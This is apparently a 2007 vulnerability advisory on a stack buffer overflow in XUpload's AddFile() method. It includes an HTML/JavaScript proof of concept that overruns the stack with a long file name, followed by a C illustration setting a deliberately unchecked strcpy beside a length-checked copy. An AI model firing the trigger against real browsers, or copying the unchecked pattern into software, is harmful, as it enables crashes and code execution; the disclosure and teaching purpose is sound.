XUpload stack-based buffer overflow vulnerability


Yorick Koster, June 2007

Abstract


A stack-based buffer overflow vulnerability exists in XUpload versions prior to 3.0.0.5. This vulnerability allows attackers to execute arbitrary code with the privileges of the target user.

Fix


This issue was fixed in XUpload Service Release 3.0.0.5.

Introduction


The XUpload ActiveX control is a client-side component that can be loaded in Internet Explorer. XUpload is used to upload arbitrary files to a web server. It is used to overcome some of the limitations that exist when the regular upload functionality of the browser is used (<input type="file" ...>). XUpload allows uploading multiple files and even entire directories recursively. XUpload is marked "Safe for scripting" and "Safe for initialization".

Stack-based buffer overflow


The AddFile() method of XUpload does not properly check the length of the file name it is given. The file name is copied into a fixed-size buffer on the stack, which allows an attacker to trigger a stack-based buffer overflow. The overflow can be used to fully overwrite the saved instruction pointer (EIP) on the stack, so an attacker can change the execution path of XUpload and consequently inject and execute arbitrary code. This code runs with the privileges of the target user. The issue is demonstrated by the following proof of concept:

<object id="XUpload" name="XUpload" width="0" height="0"
   classid="CLSID:E87F6C8E-16C0-11D3-BEF7-009027438003" codebase="XUpload.ocx">
<param name="Server" value="localhost">
<param name="Script" value="/upload.php">
</object>
<script type="text/javascript">
function StartUpload()
{
   // Build an oversized file name: each unescape() call yields five UTF-16
   // characters U+4141 (0x41 0x41 in memory), so 1024 iterations give a
   // 5120-character string (10240 bytes as a wide string) of 'A' bytes.
   var str = '';
   for(var i = 0; i < 1024; i++)
   {
      str += unescape('%u4141%u4141%u4141%u4141%u4141');
   }
   // AddFile() copies this name into a fixed-size stack buffer without a
   // length check, which overruns the buffer and the saved EIP.
   document.XUpload.AddFile(str);
}

window.onload = StartUpload;
</script>
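The bug class behind AddFile(), shown as an added C illustration that is not XUpload's code and is not derived from its binary: a hypothetical add_file_unchecked() copies a caller-controlled name into a fixed-size stack buffer with no length check (the vulnerable pattern), and add_file_checked() validates the length and rejects names that do not fit (the hardened pattern). The buffer size PATH_BUF_SIZE (260) and the 5120-character test name are assumptions chosen to mirror the shape of the proof of concept above, where the name is a plain C string rather than a BSTR.

```c
#include <stdio.h>
#include <string.h>

/* Assumed fixed size of the stack buffer (260 is the usual Windows path limit);
 * this is an illustrative value, not a fact about XUpload. */
#define PATH_BUF_SIZE 260

/* Vulnerable pattern: the caller-supplied name is copied into a fixed-size
 * stack buffer with no length check. A name longer than the buffer overruns
 * it and overwrites what follows on the stack (saved frame pointer and return
 * address), which is how the saved EIP ends up under attacker control. */
int add_file_unchecked(const char *name)
{
    char path[PATH_BUF_SIZE];
    strcpy(path, name);            /* no bound: overflows when strlen(name) >= PATH_BUF_SIZE */
    return (int)strlen(path);      /* stand-in for the real "queue this file" work */
}

/* Hardened pattern: validate the length before copying and reject anything
 * that does not fit, leaving room for the terminating NUL. The caller gets a
 * clean error instead of a corrupted stack. */
int add_file_checked(const char *name)
{
    char path[PATH_BUF_SIZE];
    size_t len = strlen(name);

    if (len >= sizeof path)
        return -1;                 /* rejected: would not fit, so never copied */

    memcpy(path, name, len + 1);   /* bounded copy including the NUL */
    return (int)strlen(path);
}

/* Build a caller-controlled name of the requested length, all 'A' bytes,
 * the same shape as the advisory's proof-of-concept input. Returns 0 on
 * success, -1 if the output buffer is too small. */
int make_long_name(char *out, size_t cap, size_t len)
{
    if (len + 1 > cap)
        return -1;
    memset(out, 'A', len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    static char name[8192];

    make_long_name(name, sizeof name, 5120);   /* 1024 * 5 characters, as in the PoC */
    printf("checked, 5120-char name: %d (rejected)\n", add_file_checked(name));
    printf("checked, short name:     %d\n", add_file_checked("upload.txt"));
    /* add_file_unchecked(name) is deliberately not called here: with a
     * 5120-byte name it would smash the stack and crash the process. */
    return 0;
}
```

The defensive point is the `len >= sizeof path` check: the copy only happens once the name is known to fit, so the size of the stack buffer can never be exceeded regardless of what the script passes in. Service Release 3.0.0.5 is where the advisory says XUpload gained equivalent protection.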